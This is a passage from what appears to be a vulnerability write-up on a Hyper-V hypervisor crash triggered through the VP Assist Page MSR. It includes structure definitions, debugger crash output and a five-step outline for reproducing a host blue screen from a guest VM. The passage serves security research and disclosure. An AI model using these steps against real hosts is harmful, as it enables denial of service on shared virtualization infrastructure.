vertical-align: baseline; white-space: pre-wrap;"> UINT64 Reserved : 11;</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> UINT64 PFN : 52;</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> };</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">} VIRTUAL_VP_ASSIST_PAGE_PFN, * PVIRTUAL_VP_ASSIST_PAGE_PFN;</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">According Hyper-V TLFS 6.0 VP Assist Page is overlay page. 
The GPA of that page is written to the PFN field:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">typedef union _HV_VP_ASSIST_PAGE</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">{</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> struct</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> {</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> //</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" 
style="background-color: transparent; color: black; font-size: 8pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> // APIC assist for optimized EOI processing.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> //</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> HV_VIRTUAL_APIC_ASSIST ApicAssist;</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> UINT32 ReservedZ0;</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> //</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 
35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> // VP-VTL control information</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> //</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> HV_VP_VTL_CONTROL VtlControl;</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> HV_NESTED_ENLIGHTENMENTS_CONTROL NestedEnlightenmentsControl;</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> BOOLEAN EnlightenVmEntry;</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; 
font-size: 8pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> UINT8 ReservedZ1[7];</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> HV_GPA CurrentNestedVmcs;</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> BOOLEAN SyntheticTimeUnhaltedTimerExpired;</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> UINT8 ReservedZ2[7];</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> //</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: 
baseline; white-space: pre-wrap;"> // VirtualizationFaultInformation must be 16 byte aligned.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> //</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> HV_VIRTUALIZATION_FAULT_INFORMATION VirtualizationFaultInformation;</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> };</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> UINT8 ReservedZBytePadding[HV_PAGE_SIZE];</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">} HV_VP_ASSIST_PAGE, 
* PHV_VP_ASSIST_PAGE;</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">If we write the PFN of a zeroed page to </span><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">HV_X64_MSR_VP_ASSIST_PAGE</span><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> MSR, we get a BSOD.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; overflow: hidden;"><img alt="Image" height="331" src="https://lh3.googleusercontent.com/tEkerKYATvVo0uoUA7cCGGAJtgnci1Ns82tzuKYxmqEgNjhbNyJ__sxOyivePMGX3CNFKYUHp09yxJlPlPUCMcOm0CwB0v27E1HK_dXWrvttl-U9HlBpASwwyoVOn8hff9dvsRFUZqdNYWbQJQ" style="margin-left: 0px; margin-top: 0px;" width="442" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Windows 10 immediately reboots, even if the automatic reboot option is disabled. If we connect a debugger to hvix64.exe (Windows Server 2019, 08.2020 updates, hvix64.exe, build 10.0.17763.1397), we get:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">hv+0x28af50:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">fffff982`efc8af50 cc int 3</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">1: kd> g</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: 
pre-wrap;">Access violation - code c0000005 (!!! second chance !!!)</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">hv+0x27747e:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">fffff982`efc7747e 384249 cmp byte ptr [rdx+49h],al</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">2: kd> k</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> # Child-SP RetAddr Call Site</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">00 00000100`00803d08 fffff982`efc75e1b hv+0x27747e</span></p><p 
dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">01 00000100`00803d10 fffff982`efcfd74f hv+0x275e1b</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">02 00000100`00803d60 fffff982`efc82729 hv+0x2fd74f</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">03 00000100`00803d90 fffff982`efc1691f hv+0x282729</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">04 00000100`00803df0 fffff982`efc1816b hv+0x21691f</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">05 00000100`00803e80 fffff982`efc8c571 hv+0x21816b</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" 
style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">06 00000100`00803fc0 00000000`00000000 hv+0x28c571</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">2: kd> r</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">rax=ffffe802c560d000 rbx=ffffe802c5607050 rcx=ffffe802c5608d00</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">rdx=0000000000000000 rsi=0000000000000000 rdi=ffffe802c5608000</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">rip=fffff982efc7747e rsp=0000010000803d08 rbp=0000000000000014</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 
35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> r8=0000000000000000 r9=0000000000000000 r10=0000000000000000</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">r11=0000000000000014 r12=0000000000000000 r13=ffffe802c56078d0</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">r14=ffffe802c5608d00 r15=ffffe802c5607630</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">iopl=0 nv up di pl zr na po nc</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">cs=0010 ss=0020 ds=0020 es=0020 fs=0020 gs=0020 efl=00010046</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; 
font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">hv+0x27747e:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">fffff982`efc7747e 384249 </span><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">cmp byte ptr [rdx+49h],al ds:0020:00000000`00000049</span><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">=??</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Windows Server 2019 generates a crash dump:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: 
inline-block; overflow: hidden;"><img height="173" src="https://lh6.googleusercontent.com/Oq8gYrusi3TepGHCsT6KWiWqbQnTuyCm0G41Yv6i1x64Pxhp3xIymYjPCtpC6nIY1nToI7jJqOOEBGnpwcfeKzN5flVqZdxv2SuGefJiI5oE7ZCPcPxHnw0MPbpRS7MiGX8hXEidim7NiQrncg" style="margin-left: 0px; margin-top: 0px;" width="491" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><b style="font-weight: normal;"><br /><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; overflow: hidden;"><img height="86" src="https://lh6.googleusercontent.com/Ydr8LWZYc4AltV5hkviHY4Qny-OpiTAr8p-gcmtVpnhtDiXXNf0wwWzw7-NGOEOXEIV6_Cs2TJpeeCgo8zSTdXun_JsbfrItvtu-VvdfkBNiycUEmjVDTpO9gCyklP_8PkUqNlNdl_pV6Il26w" style="margin-left: 0px; margin-top: 0px;" width="551" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 18pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Exploit source code is provided for Intel CPUs only (technically the exploit must work on AMD platforms too, but there is no PC with such a CPU around). Described shortly:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><b style="font-weight: normal;"><br /></b></p><ol style="margin-bottom: 0px; margin-top: 0px;"><li dir="ltr" style="background-color: transparent; color: black; font-family: calibri, sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><p dir="ltr" role="presentation" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Activate the VMX feature in the guest OS (the following command must be executed on the host OS to enable it: </span><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Set-VMProcessor -VMName &lt;VMName&gt; -ExposeVirtualizationExtensions $true</span><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">);</span></p></li><li dir="ltr" style="background-color: transparent; color: black; font-family: calibri, sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><p dir="ltr" role="presentation" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Allocate and activate a VMXON region;</span></p></li><li dir="ltr" style="background-color: transparent; color: black; font-family: calibri, sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><p dir="ltr" role="presentation" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Allocate a VP Assist Page;</span></p></li><li dir="ltr" style="background-color: transparent; color: black; font-family: calibri, sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><p dir="ltr" role="presentation" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Get the physical address of the VP Assist Page and write it to the </span><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">HV_X64_MSR_VP_ASSIST_PAGE</span><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> MSR; </span></p></li><li dir="ltr" style="background-color: transparent; color: black; font-family: calibri, sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><p dir="ltr" role="presentation" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Execute </span><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">vmclear</span><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">, then </span><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">vmlaunch</span><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">, and get a BSOD.</span></p></li></ol><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt; text-align: center;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Vulnerability internals</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 36pt; 
